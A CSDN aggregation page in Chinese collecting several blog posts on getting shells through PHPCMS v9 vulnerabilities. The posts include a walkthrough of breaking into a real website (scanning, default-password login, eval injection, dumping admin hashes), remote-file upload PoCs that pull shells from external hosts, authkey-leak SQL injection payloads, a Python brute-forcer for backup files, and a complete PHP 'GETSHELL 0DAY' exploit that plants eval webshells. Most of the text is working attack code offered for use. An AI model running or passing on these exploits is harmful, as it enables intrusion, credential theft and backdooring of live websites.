phpcmsv9数据库拿shell_phpcmsv9 数据库操作 - CSDN
精华内容
参与话题
  • phpcms v9.6.0版本getshell测试

    千次阅读 2017-09-12 08:56:22
    需要 phpcms V9.6.0安装包/ phpstudy 安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下 然后浏览器访问:http://ip/phpcms 进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的...

    其实这个漏洞是4月初的时候了。

    今天有空重新记录一下。

    一、环境搭建:

    需要 phpcms V9.6.0安装包/ phpstudy

    phpcms v9.6.0安装包下载地址:http://download.csdn.net/download/qq1124794084/9971392

    安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下

    然后浏览器访问:http://ip/phpcms

    进行安装,安装都是傻瓜式的操作,填写好数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root

    安装完成后需要在后台生成一下首页,才能访问。


    二、POC上传shell

    1.进入漏洞触发的页面-----注册页面

    按照格式随便填写。

    2.填写完毕以后,开启抓包工具,我用的是fiddler,F11截包,点击提交注册按钮。

    抓到数据包如下:


    3.创建好本地或者服务器的webshell

    我在自己本地写了个phpinfo.php

    根据过滤规则我们先把它改名为phpinfo.txt

    并启动本地的web服务器


    4.POC上传shell

    构造POC

    siteid=1&modelid=1&username=00924324&password=123456789&pwdconfirm=123456789&email=79123@qq.com&nickname=i09dfdf&info[content]=href=http://192.168.10.12/phpinfo.txt?.php#.jpg&dosubmit=1&protocol=


    注意modelid要等于1

    原来的info[Birthday]改为info[content]这样才能报错,把shell的路径暴露出来

    info后面跟的是shell的地址

    这样我们浏览器打开webshell地址

    上传成功。

    展开全文
  • 利用phpcms后台漏洞渗透某色情网站

    万次阅读 2017-04-24 13:47:44
    phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析,其采用了phpcms系统,经过测试成功获取webshell。...

    本文来源于i春秋学院,未经允许严禁转载

    phpcms v9版本最近爆了好几个漏洞,网上公开了不少信息,但没有真正实战过,就不能掌握其利用方法,本次是在偶然的机会下,发现一个网站推荐楼凤信息,通过分析,其采用了phpcms系统,经过测试成功获取webshell。

     

    1.1扫描及分析端口信息

    使用“nmap -p 1-65535 -T4 -A -v www.****.info”命令对该网站进行全端口扫描,获取端口信息如图1
    所示,扫描结束后发现网站对外开放了21、22、80、3306以及8888端口,感觉能利用的也就是21、80、3306和8888端口。
    图1端口开放情况

    1.2网站cms识别
    通过http://www.****.info/robots.txt获取其文件内容:

    User-agent: *
    
    Disallow: /caches/
    
    Disallow: /phpcms/
    
    Disallow: /install/
    
    Disallow: /api/
    
    Disallow: /admin.php/
    
    Disallow: /errpage/
    
    Disallow: /uploadfile/
    
    Disallow: /wp-crons.php/
    
    Disallow: /statics/
    
    Disallow: /plugin.php/
    
    Disallow: /jiekou.php/
    
    Disallow: /wp-crons.php/
    
    Disallow: /phpmyadmin_sjsby8239yh2w9/
    
    Disallow: /360safe/ 
    
    Disallow: /404/
    
    Disallow: /404.htm
    
    Sitemap: /sitemap.html
    
    Sitemap: /sitemap.xml

    在实际试过程中如果没有robots.txt文件,则可以通过查看源代码,查看代码文件中的关键字等信息来确认,还可以使用linux的cms识别工具进行检查。

     

    1.3可利用信息分析和测试
    经过分析,该网站为phpcms的可能性最高,就以上信息,可以利用的有:
    (1)“/phpmyadmin_sjsby8239yh2w9”可能为phpmyadmin管理地址,经过核实不存在该路径。
    (2)admin.php为后台管理地址,经核实http://www.****.info/admin.php无法访问,如图2所示,提示页面没有找到。后续对http://www.****.info/jiekou.php、http://www.****.info/phpcms/、http://www.****.info/caches/进行访问,未发现明显可以利用的信息。

    图2页面无法访问

    1.4端口信息测试
    (1)8888端口访问后,获取后台http://www.****.info:8888/index.php?m=Public&a=login,如图3所示,该平台为LuManager,通过该平台可以管理ftp、mysql数据库等,该平台2.0.99版本还存在SQL注入漏洞以及后台密码绕过漏洞,其url地址为:
    (2)80端口对应主站域名。

    图3LuManager管理后台

    1.5phpsso_server后台管理
    直接打开phpsso_server后台管理地址,如图4所示,可以使用默认admin/phpcms进行登录,在本例中顺利登录其后台地址,如图5所示,在该后台首页中可以获取phpcms的版本信息,服务器环境信息,会员总数等。

    图4获取phpsso_server后台

    图5成功登录后台

    1.6获取webshell尝试

    1.查看Ucenter配置
    在后台管理中单击“系统设置”-“Ucenter配置”,如图6所示,该界面是用来对接Ucerter接口,在Ucenter api地址中存在漏洞。

    图6Ucenter配置

    2.定位关键字
    使用Google浏览器Chrome,使用F12功能键,在dock位置中选择上下,然后在源代码中使用“Ctrl+F”快捷键进行关键字“api”搜索,如图7所示,找到id为uc_api的那一栏。

    图7定位uc_api

    3.修改关键字
    选中后,在Google弹出的菜单中选择编辑html,使用代码进行替换:

    <input type="text" class="input-text" name="data[uc_api','test');'\]" id="uc_api" value=";eval($_POST[g]);//" size="50">


    图8修改参数值

    4.获取webshell
    选择“提交”并“更新缓存”即可获取shell,shell一句话后门密码为g,shell地址为:
    http://127.0.0.1 /phpsso_server/caches/configs/uc_config.php,如图9所示,成功获取webshell。

    图9获取webshell

     

    1.7后续数据分析

    1.获取管理员密码
    通过查看该数据库xinxi_admin表,获取管理员相关信息,如图10所示,username、password、encrypt以及email信息。

    图10获取管理员密码

    2.破解管理员密码
    phpcms 密码是采用md5加盐,在http://www.cmd5.com/网站中选择加密算法:md5(md5($pass).$salt);Vbulletin;IceBB;dz即可进行破解。如图11所示,如果查询到这会提示进行购买。phpcms会员密码也是采用同样算法,其表为xinxi_member、xinxi_sso_members。

    图11破解phpcms管理员密码

    1.8总结
    如果知道phpcms的sso管理员密码,则可以通过该方法来获取管理员密码。

    展开全文
  • PHPcmsV9任意文件读取漏洞拿Shell

    千次阅读 2012-08-02 21:57:53
    简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,...

    编辑:madman 日期:2012-07-29 分类:技术文章最新漏洞 评论:9条评论
    简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解不了他的密码,其实我想说你丫的...

    作者:Return

    前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员

    觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为

    他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发

    分子拿到密码也没用因为破解不了他的密码,其实我想说你丫的把黑阔当傻子?你能想到

    的别人想不到,废话就不说了,看着就是了~~

    本地搭建的phpcsmV9.现用漏洞或者工具读取数据库信息:

     

    数据库phpcmsv9用户名:root  密码为空

    我们用一款数据库管理工具连接数据库我用的是navicat

    打开工具点击连接-mysql配置数据库信息如图:

    打开phpcmsV9数据库并且找到admin表,向表中添加一条数据,因为我们没法破解他的密码那么咱们就自己

    添加一个用户以便能够登录后台操作:

    Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

    注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:creturn.com的超级管理员

    后台登录地址:localhost/index.php?m=admin

    用户名:admin 密码:creturn.com

    登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表

    然后点击里面的search目录下面的index.html右侧的编辑

    修改其模版为:

    <?php $shell '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

    提交保存

    然后访问:localhost/index.php?m=search

    会在根目录生成一个shell.php的一句话,我们连接看看

    可以看到已经拿到shell,记得把修改的模版改回去。

    至此,如果还有管理员认为这个漏洞是鸡肋,那我就无话可说了!

    最近发现有人那我写的Exp改作者名和版权信息后发到自己的站上,等我有时间了会光顾你们的!

    如需转载请注明来源,否则后果自付!

    展开全文
  • phpcms 漏洞姿势

    千次阅读 2019-07-11 10:42:30
    一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 ...

    一 .PHPCMS V9本地文件包含漏洞

    漏洞出现在如下文件:phpcms/modules/search/index.php

    代码如下:

    在这里插入图片描述

    本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数
    因此可以构造payload如下

    www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php
    

    如果存在漏洞即可成功读取到phpcms的数据库配置文件,如图

    在这里插入图片描述

    二. phpcms V9 sql备份文件名爆破

    参考文章:phpcms V9 sql备份文件名爆破

    payload:/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/gv5dmx<<.sql

    我们知道windows的FindFirstFile(API)有个特性就是可以把<<当成通配符来用
    而PHP的opendir(win32readdir.c)就使用了该API。PHP的文件操作函数均调用了opendir,所以file_exists也有此特性。

    这个漏洞和前一阵子dedecms后台爆破如出一辙,api.php文件的$op变量决定用户的操作

    在这里插入图片描述

    在/api/creatimg.php文件中,使用了file_exists()函数判断fontfilefontfile文件是否存在,文件存在和不存在的返回信息是不同的,而且fontfile可以被用户控制,且未过滤.和/等符号,最终导致了漏洞发生。

    #/api/creatimg.php
    
    <?php
    
    defined(‘IN_PHPCMS’) or exit(‘No permission resources.’); 
    
    $txt = trim($_GET['txt']);
    
    if(extension_loaded(‘gd’) && $txt ) {
    
        ……
    
        $fontfile = isset($_GET['font']) && !empty($_GET['font']) ? $fontpath.trim($_GET['font']) : $fontpath.’georgia.ttf’;
    
        ……
    
        if(file_exists($fontfile)){
    
            //计算文本写入后的宽度,右下角 X 位置-左下角 X 位置
    
            $image_info = imagettfbbox($fontsize,0,$fontfile,$txt);
    
            $imageX = $image_info[2]-$image_info[0]+10;
    
            $imageY = $image_info[1]-$image_info[7]+5;
        ……
    

    爆破脚本如下:

    #!/usr/bin/env python
    
    # coding=utf-8
    
    ”’/*
    
        * author = Mochazz
    
        * team   = 红日安全团队
    
        * env    = pyton3
    
        *
    
        */
    
    ”’
    
    import requests
    
    import itertools
    
    characters = “abcdefghjklmnopqrstuvwxyz0123456789_!#”
    
    backup_sql = “”
    
    payload = “/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<”
    
    url = “http://192.168.0.106″
    
    flag = 0
    
    for num in range(1,7):
    
        if flag:
    
            break
    
        for pre in itertools.permutations(characters,num):
    
            pre = ”.join(list(pre))
    
            payload = payload.format(location=pre)
    
            r = requests.get(url+payload)
    
            if r.status_code == 200 and “PNG” in r.text:
    
                flag = 1
    
                backup_sql = pre
    
                payload = “/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<”
    
                break
    
            else:
    
                payload = “/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<”
    
    print(“[+] 前缀为:”,backup_sql)
    
    flag = 0
    
    for i in range(30):
    
        if flag:
    
            break
    
        for ch in characters:
    
            if ch == characters[-1]:
    
                flag = 1
    
                break
    
            payload = payload.format(location=backup_sql+ch)
    
            r = requests.get(url + payload)
    
            if r.status_code == 200 and “PNG” in r.text:
    
                backup_sql += ch
    
                print(“[+] “,backup_sql)
    
                payload = “/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<”
    
                break
    
            else:
    
                payload = “/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<”
    
    print(“备份sql文件地址为:”,backup_sql+”.sql”)
    

    效果如下:

    在这里插入图片描述
    拿到SQL文件后,可以导入本地查看,后续操作这里不多加赘述

    三、PHPCMS前台上传getshell

    漏洞复现参考(https://www.hackersb.cn/hacker/219.html)

    漏洞复现的办法是先打开注册页面:

    www.xxx.com/index.php?m=member&c=index&a=register&siteid=1]www.xxx.com/index.php?m=member&c=index&a=register&siteid=
    

    然后向注册页面POST如下payload:

    siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=
    然后就会报错并返回shell地址:
    在这里插入图片描述

    然后就可以连接啦。

    在这里插入图片描述

    但我在实战测试过程中发现这个漏洞由于危害极大,基本上都已经被运维打补丁了,因此现在存在这个漏洞的站点并不是很多

    五、PHPCMS利用authkey泄露进行注入

    众所周和PHPCMS在拿到authkey(这边简称key吧),便有一大堆注入,在此给大家简单讲解一下

    首先分享一下爆出key的payload

    www.xxx.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
    

    在这里插入图片描述

    如图中的XI0G8h0TYyWTwZMFIgN9nxHUN9Syymf便是我们所说的key

    拿到key后,我们该怎么办呢?

    我们这边使用一个名为a.php的exp(exp请回复后下载)

    大家可以使用phpstudy安装PHP环境

    用法:将a.php丢到phpstudy配置的网站根目录中

    访问url:

    http://localhost/a.php?url=你要测试的url(不要加http)&key=你得到的key&id=userid=1%20and%20(SELECT%201%20FROM(SELECT%20count(*),concat((SELECT(SELECT%20concat(0x7e,0×27,cast((substring((select+concat(0x7e,0×27,username,0x3a,+password,+0x3a,+encrypt,0×27,0×40,0x7e)+FROM+`v9_admin`+WHERE+1+limit+0,1),1,62))%20as%20char),0×27,0x7e))%20FROM%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20FROM%20information_schema.columns%20group%20by%20x)a)
    

    即可得到后台账号和密码,但是密码是加了salt的,大家可以去
    http://cmd.la进行解密,但是是要收费的,你懂得

    在这里插入图片描述
    然后使用解出的明文密码登录www.xxx.com/admin.php即可~

    六、利用fuzz框架批量检测PHPCMS漏洞

    我作为一名懒人,叫我一个个地手动检测漏洞是很不现实的,因此我选择使用test404的一款http fuzz框架实现批量检测
    简单地编写了一下上述漏洞的插件,采集url进行批量fuzz,效果还是很不错的
    如图是使用爆key插件的结果(还有很多了,不一一展示)
    这些爆出key的大部分都是存在SQL注入的

    image.png有时候还会有福利,搞到个美女图片站什么的,把资源全部打包爽歪歪。。。image.png
    至于插件一类的,大家可以阅读原文下载哈~

    七、后缀绕过漏洞(apache服务器)

    漏洞文件:phpcms\modules\attachment\attachments.php
    后缀检测:phpcms\modules\attachment\functions\global.func.php

    Fileext函数是对文件后缀名的提取。
    根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
    经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。
    我们回到public function crop_upload() 函数中

    if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
    

    在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
    这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
    经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
    最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
    看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。

    PHPCMS V9 EXP

    <?php
    error_reporting(E_ERROR);
    set_time_limit(0);
    $pass="ln";
    print_r('
    +---------------------------------------------------------------------------+
    PHPCms V9 GETSHELL 0DAY
     
    code by L.N.
     
    apache 适用(利用的apache的解析漏洞) // www.uedbox.com
    +---------------------------------------------------------------------------+
    ');
    if ($argc < 2) {
        print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' url path
     
    Example:
    1.php '.$argv[0].' lanu.sinaapp.com
    2.php '.$argv[0].' lanu.sinaapp.com /phpcms
    +---------------------------------------------------------------------------+
    ');
        exit;
    }
     
    $url = $argv[1];
    $path = $argv[2];
    $phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
    $file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
    if ($ret=Create_dir($url, $path)) {
        //echo $ret;
        $pattern = "|Server:[^,]+?|U";
        preg_match_all($pattern, $ret, $matches);
        if ($matches[0][0]) {
            if (strpos($matches[0][0], 'Apache') == false) {
                echo "\n亲!此网站不是apache的网站。\n";
                exit;
            }
        }
        $ret = GetShell($url, $phpshell, $path, $file);
        $pattern = "|http:\/\/[^,]+?\.,?|U";
        preg_match_all($pattern, $ret, $matches);
        if ($matches[0][0]) {
            echo "\n".'密码为: '.$pass."\n";
            echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";
            exit;
        } else {
            $pattern = "|\/uploadfile\/[^,]+?\.,?|U";
            preg_match_all($pattern, $ret, $matches);
            if ($matches[0][0]) {
                echo "\n".'密码为: '.$pass."\n";
                echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";
                exit;
            } else {
                echo "\r\n没得到!\n";
                exit;
            }
        }
    }
     
    function GetShell($url, $shell, $path, $js)
    {
        $content =$shell;
        $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
        $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        $ock=fsockopen($url, 80);
        if (!$ock) {
            echo "\n"."此网站没有回应,检测url是否输入正确"."\n";
            exit;
        } else {
            fwrite($ock, $data);
            $resp = '';
            while (!feof($ock)) {
                $resp.=fread($ock, 1024);
            }
            return $resp;
        }
    }
     
    function Create_dir($url, $path='')
    {
        $content ='I love you';
        $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
        $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        $ock=fsockopen($url, 80);
        if (!$ock) {
            echo "\n"."此网站没有回应,检测url是否输入正确"."\n";
            exit;
        }
        fwrite($ock, $data);
        $resp = '';
        while (!feof($ock)) {
            $resp.=fread($ock, 1024);
        }
        return $resp;
    }
    ?> 
    

    原文 https://www.freebuf.com/column/180754.html

    展开全文
  • PHPCMS V9.1.13任意文件包含漏洞分析

    千次阅读 2012-08-20 09:55:28
    最近爆出了PHPCMS V9.1.13任意文件包含漏洞,新版本(v9.1.16)已经针对该漏洞做了修复。 下载PHPCMS V9.1.13,解压。 这里我就用Linux天生具备的高效分析能力去快速定位存在漏洞的函数。就懒得...
  • 当前服务器安全补丁管理功能可检测和修复的漏洞如下(若有新的补丁将更新在这里): 补丁编号 路径 漏洞名称 漏洞描述 ...phpwind ubb标签属性xss
  • phpcms的漏洞复现

    千次阅读 2019-09-26 22:35:53
    xxxxxxxxxxx
  • 常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshellshell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,...
  • php面试题汇总(必会)一:

    万次阅读 多人点赞 2018-06-07 14:44:15
    1、酒店预订怎么实现?怎么设计表  你好,我大概的说下我们的业务流程,我们的业务流程是:用户在网站浏览酒店信息,可以根据地区检索出该地区的酒店信息。列表展示酒店的信息由:酒店的名称,酒店图片,酒店位置...
  • Linux云计算架构

    千次阅读 2016-01-08 08:39:00
    第一阶段: Linux之美 课程 Linux系统管理 ...Shell编程 Python脚本编程 Linux系统管理 内容 计算机基础 网络基础 Windows Server基础 Linux简介 Linu
  • CTF-练习平台 writeup web

    万次阅读 2018-03-22 16:23:17
    bugku Web WriteUp 刚刚接触ctf没多久,做ctf-练习平台上的题目,有些新的题目,在网上没有找到对应的writeup,所以做了之后就想自己写一个,也顺便理理自己的思路。(没有太多经验…可能对有些题目的理解还不深刻...
  • 个人渗透笔记

    千次阅读 2016-07-10 18:32:59
    拿shell 】 1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞":1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls 2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本...
  • MYSQL--事务处理

    千次阅读 2013-05-28 14:03:21
    事务处理在各种管理系统中都有着广泛的应用,比如人员管理系统,很多同步数据库操作大都需要用到事务处理。比如说,在人员管理系统中,你删除一个人员,你即需要删除人员的基本资料,也要删除和该人员相关的信息,如...
  • 2018经典PHP面试题大全

    千次阅读 2018-09-18 15:25:18
    2018PHP经典面试题大全汇总 2018/2/28 13:49:56 点击次数:4913  1、PHP语言的一大优势是跨平台,什么是跨平台?  PHP的运行环境最优... 2、WEB开发中数据提交方式有几种?有什么区别?百度使用哪种方式?  Get与...
  • 签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改...--KEY&#
  • 这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。...本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和...
  • 【转】CMS5

    万次阅读 2009-06-30 23:40:00
    国外 CMS 提供商Vignette. 奥斯汀, TX Vignette公司,网站内容管理系统的领导者,今天宣布在中层楼资金上它取得了1亿4千万美元,成为奥斯汀基础软件公司中最大的私人资产投资,同时也使Vignette成为在奥斯汀发展最快...
  • PHPCMS最新版任意文件上传漏洞分析

    千次阅读 2017-09-22 17:37:43
    前几天就听朋友说PHPCMS最新版出了几个洞,有注入还有任意文件上传,注入我倒不是很惊讶,因为phpcms只要到了authkey注入就一大堆…… 任意文件上传倒是很惊讶,但是小伙伴并没有给我exp,今天看到了EXP,但是...
  • CTF-练习平台 Web writeup

    万次阅读 2018-03-03 09:27:32
    签到题web2文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="...1计算题改一下浏览器中的text的...
1 2 3 4 5 ... 8
收藏数 143
精华内容 57
关键字:

phpcmsv9数据库拿shell